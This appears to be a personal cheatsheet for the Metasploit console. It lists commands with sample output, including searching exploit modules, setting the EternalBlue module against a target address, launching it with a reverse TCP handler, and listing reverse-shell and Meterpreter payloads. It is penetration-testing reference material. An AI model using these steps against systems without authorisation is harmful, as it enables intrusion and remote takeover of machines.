Metasploit Console: my own cheatsheet

Metasploit Framework is a priceless open-source a tool for developing and executing exploit code against a remote target machine.

Its main admin interface, the Metasploit console has many different command options to chose from.
Here my own set (in alphabetical order) of main metasploit commands with a brief reference.


back

Once you have finished working with a particular module use the back command to move out of the current context.

msf exploit(multi/http/struts2_content_type_ognl) > back
msf >

check

(Not supported by all exploit) check option that will check to see if a target is vulnerable.

msf exploit(multi/http/struts2_content_type_ognl) > check
[*] www.xxxxxx.org:8080 The target is not exploitable.

color

Enable or disable color output of msfconsole.

msf > color
Usage: color >'true'|'false'|'auto'>

Enable or disable color output.

connect

Netcat-like command built into the msfconsole.

msf > connect 192.168.1.1 80
[*] Connected to 192.168.1.1:80

HTTP/1.0 400 Bad Request
Content-Type: text/html
X-Frame-Options: SAMEORIGIN
Date: Tue, 05 Dec 2017 14:12:13 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Accept-Ranges: bytes
Connection: close

<html>
<head>
 <title>400 Bad Request</title>
</head>
<body bgcolor="#ffffff">
 <h2>400 Bad Request</h2>
 <p></p>
</body>
</html>
msf >

edit

Edit the current module in Vim.

msf exploit(windows/smb/ms17_010_eternalblue) > edit
[!] LocalEditor or $VISUAL/$EDITOR should be set. Falling back on vim.
[*] Launching vim /opt/metasploit-framework/embedded/framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb

exit

Exit msfconsole.

msf exploit(windows/smb/ms17_010_eternalblue) > exit
[email protected]:~$

exploit (run)

Starts the current exploit.

msf exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.1.1
RHOST => 192.168.1.1
msf exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 192.168.1.6:4444
[*] 192.168.1.1:445 - Connecting to target for exploitation.

grep

Command is similar to Linux grep. It matches a given pattern from the output of another msfconsole command.

msf > grep
Usage: grep [options] pattern cmd

Grep the results of a console command (similar to Linux grep command)

OPTIONS:

    -A <opt>  Show arg lines of output After a match.
    -B <opt>  Show arg lines of output Before a match.
    -c        Only print a count of matching lines.
    -h        Help banner.
    -i        Ignore case.
    -k <opt>  Keep (include) arg lines at start of output.
    -m <opt>  Stop after arg matches.
    -s <opt>  Skip arg lines of output before attempting match.
    -v        Invert match.


help

Returns a list and small description of all available commands.

msf > help

Core Commands
=============

    Command       Description
    -------       -----------
    ?             Help menu
    banner        Display an awesome metasploit banner
    cd            Change the current working directory
    color         Toggle color
    connect       Communicate with a host

info

Provides detailed information about a particular module including all options, targets, and other information.

msf > info exploit/windows/smb/ms17_010_eternalblue

       Name: MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
     Module: exploit/windows/smb/ms17_010_eternalblue
   Platform: Windows
       Arch:
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Average
  Disclosed: 2017-03-14

Provided by:
  Sean Dillon <[email protected]>
  Dylan Davis <[email protected]>
  Equation Group
  Shadow Brokers
  thelightcosine

Available targets:
  Id  Name
  --  ----
  0   Windows 7 and Server 2008 R2 (x64) All Service Packs

Basic options:
...

irb

Opens a live ruby interpreter shell.

msf > irb
[*] Starting IRB shell...

>> puts "Test!"
Test!

jobs

Provides the ability to list and terminate background jobs.

msf > jobs -h
Usage: jobs [options]

Active job manipulation and interaction.

OPTIONS:

    -K        Terminate all running jobs.
    -h        Help banner.
    -i <opt>  Lists detailed information about a running job.
    -k <opt>  Terminate the specified job name.
    -l        List all running jobs.
    -v        Print more detailed info.  Use with -i and -l

msf >

kill

Kill any running jobs.

msf exploit(windows/smb/ms17_010_eternalblue) > kill 0
Stopping job: 0...

load

Loads a plugin from Metasploit’s plugin directory.

msf > load
Usage: load [var=val var=val ...]

Loads a plugin from the supplied path.
For a list of built-in plugins, do: load -l
The optional var=val options are custom parameters that can be passed to plugins.


loadpath

Load a third-part module tree.

msf > loadpath /home/andrea/modules

Loaded 0 modules.

unload

Unloads a previously loaded plugin and removes any extended commands.

msf > unload pcap_log
Unloading plugin pcap_log...unloaded.

resource

Runs resource files that can be loaded through msfconsole.

msf > resource
Usage: resource path1 [path2 ...]

Run the commands stored in the supplied files.  Resource files may also contain
ruby code between  tags.

See also: makerc

search

Regular-expression based search functionality (naming convention for Metasploit modules uses underscores versus hyphens).

msf > search struts

Matching Modules
================

   Name                                                     Disclosure Date  Rank       Description
   ----                                                     ---------------  ----       -----------
   exploit/multi/http/struts2_content_type_ognl             2017-03-07       excellent  Apache Struts Jakarta Multipart Parser OGNL Injection
   exploit/multi/http/struts2_rest_xstream                  2017-09-05       excellent  Apache Struts 2 REST Plugin XStream RCE
   exploit/multi/http/struts_code_exec                      2010-07-13       good       Apache Struts Remote Command Execution
   exploit/multi/http/struts_code_exec_classloader          2014-03-06       manual     Apache Struts ClassLoader Manipulation Remote Code Execution
   exploit/multi/http/struts_code_exec_exception_delegator  2012-01-06       excellent  Apache Struts Remote Command Execution

Searches can be refined by using a built-in keyword system:

msf > help search
Usage: search [keywords]

Keywords:
  app       :  Modules that are client or server attacks
  author    :  Modules written by this author
  bid       :  Modules with a matching Bugtraq ID
  cve       :  Modules with a matching CVE ID
  edb       :  Modules with a matching Exploit-DB ID
  name      :  Modules with a matching descriptive name
  platform  :  Modules affecting this platform
  ref       :  Modules with a matching ref
  type      :  Modules of a specific type (exploit, auxiliary, or post)

Examples:
  search cve:2009 type:exploit app:client

name

Search using a descriptive name.

msf > search name:struts

Matching Modules
================

   Name                                                     Disclosure Date  Rank       Description
   ----                                                     ---------------  ----       -----------
   exploit/multi/http/struts2_content_type_ognl             2017-03-07       excellent  Apache Struts Jakarta Multipart Parser OGNL Injection
   exploit/multi/http/struts2_rest_xstream                  2017-09-05       excellent  Apache Struts 2 REST Plugin XStream RCE
   exploit/multi/http/struts_code_exec                      2010-07-13       good       Apache Struts Remote Command Execution
   exploit/multi/http/struts_code_exec_classloader          2014-03-06       manual     Apache Struts ClassLoader Manipulation Remote Code Execution
   exploit/multi/http/struts_code_exec_exception_delegator  2012-01-06       excellent  Apache Struts Remote Command Execution

platform

Search to modules that affect a specific platform.

msf > search platform:android

Matching Modules
================

   Name                                                      Disclosure Date  Rank       Description
   ----                                                      ---------------  ----       -----------
   exploit/android/browser/samsung_knox_smdm_url             2014-11-12       excellent  Samsung Galaxy KNOX Android Browser RCE
   exploit/android/browser/stagefright_mp4_tx3g_64bit        2015-08-13       normal     Android Stagefright MP4 tx3g Integer Overflow
   exploit/android/browser/webview_addjavascriptinterface    2012-12-21       excellent  Android Browser and WebView addJavascriptInterface Code Execution
   exploit/android/fileformat/adobe_reader_pdf_js_interface  2014-04-13       good       Adobe Reader for Android addJavascriptInterface Exploit
   exploit/android/local/futex_requeue                       2014-05-03       excellent  Android 'Towelroot' Futex Requeue Kernel Exploit
   exploit/android/local/put_user_vroot                      2013-09-06       excellent  Android get_user/put_user Exploit
   exploit/multi/handler                                                      manual     Generic Payload Handler
   exploit/multi/local/allwinner_backdoor                    2016-04-30       excellent  Allwinner 3.4 Legacy Kernel Local Privilege Escalation
   payload/android/meterpreter/reverse_http                                   normal     Android Meterpreter, Android Reverse HTTP Stager
   payload/android/meterpreter/reverse_https                                  normal     Android Meterpreter, Android Reverse HTTPS Stager
   payload/android/meterpreter/reverse_tcp                                    normal     Android Meterpreter, Android Reverse TCP Stager
   payload/android/meterpreter_reverse_http                                   normal     Android Meterpreter Shell, Reverse HTTP Inline
   payload/android/meterpreter_reverse_https                                  normal     Android Meterpreter Shell, Reverse HTTPS Inline
   payload/android/meterpreter_reverse_tcp                                    normal     Android Meterpreter Shell, Reverse TCP Inline

author

Search for modules by a specific author.

msf > search author:rapid7

Matching Modules
================

   Name                                                       Disclosure Date  Rank       Description
   ----                                                       ---------------  ----       -----------
   auxiliary/admin/atg/atg_client                                              normal     Veeder-Root Automatic Tank Gauge (ATG) Administrative Client
   auxiliary/admin/cisco/cisco_asa_extrabacon                                  normal     Cisco ASA Authentication Bypass (EXTRABACON)
   auxiliary/admin/dns/dyn_dns_update                                          normal     DNS Server Dynamic Update Record Injection
   auxiliary/admin/http/allegro_rompager_auth_bypass          2014-12-17       normal     Allegro Software RomPager 'Misfortune Cookie' (CVE-2014-9222) Authentication Bypass
   auxiliary/admin/upnp/soap_portmapping                                       normal     UPnP IGD SOAP Port Mapping Utility
   auxiliary/dos/http/slowloris                               2009-06-17       normal     Slowloris Denial of Service Attack
   auxiliary/dos/misc/ibm_tsm_dos                             2015-12-15       normal     IBM Tivoli Storage Manager FastBack Server Opcode 0x534 Denial of Service

 

Keywords can also be combined further narrow down the returned results:

msf > search type:exploit name:struts cve:2017

Matching Modules
================

   Name                                          Disclosure Date  Rank       Description
   ----                                          ---------------  ----       -----------
   exploit/multi/http/struts2_content_type_ognl  2017-03-07       excellent  Apache Struts Jakarta Multipart Parser OGNL Injection
   exploit/multi/http/struts2_rest_xstream       2017-09-05       excellent  Apache Struts 2 REST Plugin XStream RCE

sessions

Allows to list, interact with, and kill spawned sessions.

msf > sessions -h
Usage: sessions [options] or sessions [id]

Active session manipulation and interaction.

OPTIONS:

    -C <opt>  Run a Meterpreter Command on the session given with -i, or all
    -K        Terminate all sessions
    -c <opt>  Run a command on the session given with -i, or all
    -h        Help banner
    -i <opt>  Interact with the supplied session ID
    -k <opt>  Terminate sessions by session ID and/or range
    -l        List all active sessions
    -q        Quiet mode
    -r        Reset the ring buffer for the session given with -i, or all
    -s <opt>  Run a script on the session given with -i, or all
    -t <opt>  Set a response timeout (default: 15)
    -u <opt>  Upgrade a shell to a meterpreter session on many platforms
    -v        List sessions in verbose mode
    -x        Show extended information in the session table

Many options allow specifying session ranges using commas and dashes.
For example:  sessions -s checkvm -i 1,3-5  or  sessions -k 1-2,5,6

set

Set framework options and parameters for the current module.

msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.1.1
RHOST => 192.168.1.1
msf exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   GroomAllocations    12               yes       Initial number of times to groom the kernel pool.
   GroomDelta          5                yes       The amount to increase the groom count by per try.
   MaxExploitAttempts  3                yes       The number of times to retry the exploit.
   ProcessName         spoolsv.exe      yes       Process to inject payload into.
   RHOST               192.168.1.1      yes       The target address
   RPORT               445              yes       The target port (TCP)
   SMBDomain           .                no        (Optional) The Windows domain to use for authentication
   SMBPass                              no        (Optional) The password for the specified username
   SMBUser                              no        (Optional) The username to authenticate as
   VerifyArch          true             yes       Check if remote architecture matches exploit Target.
   VerifyTarget        true             yes       Check if remote OS matches exploit Target.


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs

unset

Removes a parameter previously configured with set. (unset all removes all assigned variables)

msf exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.1.1
RHOST => 192.168.1.1
msf exploit(windows/smb/ms17_010_eternalblue) > unset rhost
Unsetting rhost...

setg

Set a global variables within msfconsole. The current environment can be saved with save command.

msf > setg LHOST 192.168.1.6
LHOST => 192.168.1.6
msf > setg RHOSTS 192.168.1.0/24
RHOSTS => 192.168.1.0/24
msf > save 
Saved configuration to: /home/andrea/.msf4/config

show

Shows every module within Metasploit.

msf > show

Encoders
========

   Name                    Disclosure Date  Rank       Description
   ----                    ---------------  ----       -----------
   cmd/generic_sh                           good       Generic Shell Variable Substitution Command Encoder
   cmd/ifs                                  low        Generic ${IFS} Substitution Command Encoder
   cmd/printf_php_mq                        manual     printf(1) via PHP magic_quotes Utility Command Encoder

auxiliary

Display a list of all of the available auxiliary modules.

msf > show auxiliary
Auxiliary
=========

   Name                                                  Disclosure Date  Rank    Description
   ----                                                  ---------------  ----    -----------
   admin/2wire/xslt_password_reset                       2007-08-15       normal  2Wire Cross-Site Request Forgery Password Reset Vulnerability
   admin/backupexec/dump                                                  normal  Veritas Backup Exec Windows Remote File Access
   admin/backupexec/registry                                              normal  Veritas Backup Exec Server Registry Access

exploits

Returns a list of all exploits contained in the framework.

msf > show exploits

Exploits
========

   Name                                                           Disclosure Date  Rank       Description
   ----                                                           ---------------  ----       -----------
   aix/rpc_cmsd_opcode21                                          2009-10-07       great      AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow
   aix/rpc_ttdbserverd_realpath                                   2009-06-17       great      ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX)
   bsdi/softcart/mercantec_softcart                               2004-08-19       great      Mercantec SoftCart CGI Overflow

payloads

show payloads will display all of the different payloads available.

msf > show payloads

Payloads
========

   Name                                             Disclosure Date  Rank    Description
   ----                                             ---------------  ----    -----------
   aix/ppc/shell_bind_tcp                                            normal  AIX Command Shell, Bind TCP Inline
   aix/ppc/shell_find_port                                           normal  AIX Command Shell, Find Port Inline
   aix/ppc/shell_interact                                            normal  AIX execve shell for inetd

 

In the context of a particular exploit, show payloads will only display the payloads that are compatible with that particular exploit.

msf exploit(windows/smb/ms17_010_eternalblue) > show payloads

Compatible Payloads
===================

   Name                                        Disclosure Date  Rank    Description
   ----                                        ---------------  ----    -----------
   generic/custom                                               normal  Custom Payload
   generic/shell_bind_tcp                                       normal  Generic Command Shell, Bind TCP Inline
   generic/shell_reverse_tcp                                    normal  Generic Command Shell, Reverse TCP Inline
   windows/x64/exec                                             normal  Windows x64 Execute Command
   windows/x64/loadlibrary                                      normal  Windows x64 LoadLibrary Path
   windows/x64/meterpreter/bind_ipv6_tcp                        normal  Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager
   windows/x64/meterpreter/bind_ipv6_tcp_uuid                   normal  Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager with UUID Support

targets

Within the context of an exploit module show targets returns which targets are supported.

msf exploit(windows/smb/ms17_010_eternalblue) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs

advanced

Display more advanced options.

msf exploit(windows/smb/ms17_010_eternalblue) > show advanced

Module advanced options (exploit/windows/smb/ms17_010_eternalblue):

   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   CHOST                                    no        The local client address
   CPORT                                    no        The local client port
   ConnectTimeout          10               yes       Maximum number of seconds to establish a TCP connection
   ContextInformationFile                   no        The information file that contains context information
   DisablePayloadHandler   false            no        Disable the handler code for the selected payload
   EnableContextEncoding   false            no        Use transient context when encoding payloads
   Proxies                                  no        A proxy chain of format type:host:port[,type:host:port][...]
   SSL                     false            no        Negotiate SSL/TLS for outgoing connections
   SSLCipher                                no        String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
   SSLVerifyMode           PEER             no        SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
   SSLVersion              Auto             yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL3, TLS1, TLS1.1, TLS1.2, SSL23)
   VERBOSE                 false            no        Enable detailed status messages
   WORKSPACE                                no        Specify the workspace for this module
   WfsDelay                0                no        Additional delay when waiting for a session

encoders

Display a listing of the encoders that are available within MSF.

msf > show encoders
Compatible Encoders
===================

   Name                    Disclosure Date  Rank       Description
   ----                    ---------------  ----       -----------
   cmd/generic_sh                           good       Generic Shell Variable Substitution Command Encoder
   cmd/ifs                                  low        Generic ${IFS} Substitution Command Encoder
   cmd/printf_php_mq                        manual     printf(1) via PHP magic_quotes Utility Command Encoder
   generic/none                             normal     The "none" Encoder
   mipsbe/longxor                           normal     XOR Encoder
   mipsle/longxor                           normal     XOR Encoder
   php/base64                               great      PHP Base64 encoder
   ppc/longxor                              normal     PPC LongXOR Encoder
   ppc/longxor_tag                          normal     PPC LongXOR Encoder
   sparc/longxor_tag                        normal     SPARC DWORD XOR Encoder

nops

Display the available NOP Generators.

msf > show nops
NOP Generators
==============

   Name             Disclosure Date  Rank    Description
   ----             ---------------  ----    -----------
   armle/simple                      normal  Simple
   mipsbe/better                     normal  Better
   php/generic                       normal  PHP Nop Generator
   ppc/simple                        normal  Simple
   sparc/random                      normal  SPARC NOP Generator
   tty/generic                       normal  TTY Nop Generator
   x64/simple                        normal  Simple
   x86/opty2                         normal  Opty2
   x86/single_byte                   normal  Single Byte

use

Select a module.

msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(windows/smb/ms17_010_eternalblue) > show info

       Name: MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
     Module: exploit/windows/smb/ms17_010_eternalblue
   Platform: Windows
       Arch:
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Average
  Disclosed: 2017-03-14

Provided by:
  Sean Dillon <[email protected]>
  Dylan Davis <[email protected]>
  Equation Group
  Shadow Brokers
  thelightcosine

 


References

 

Comments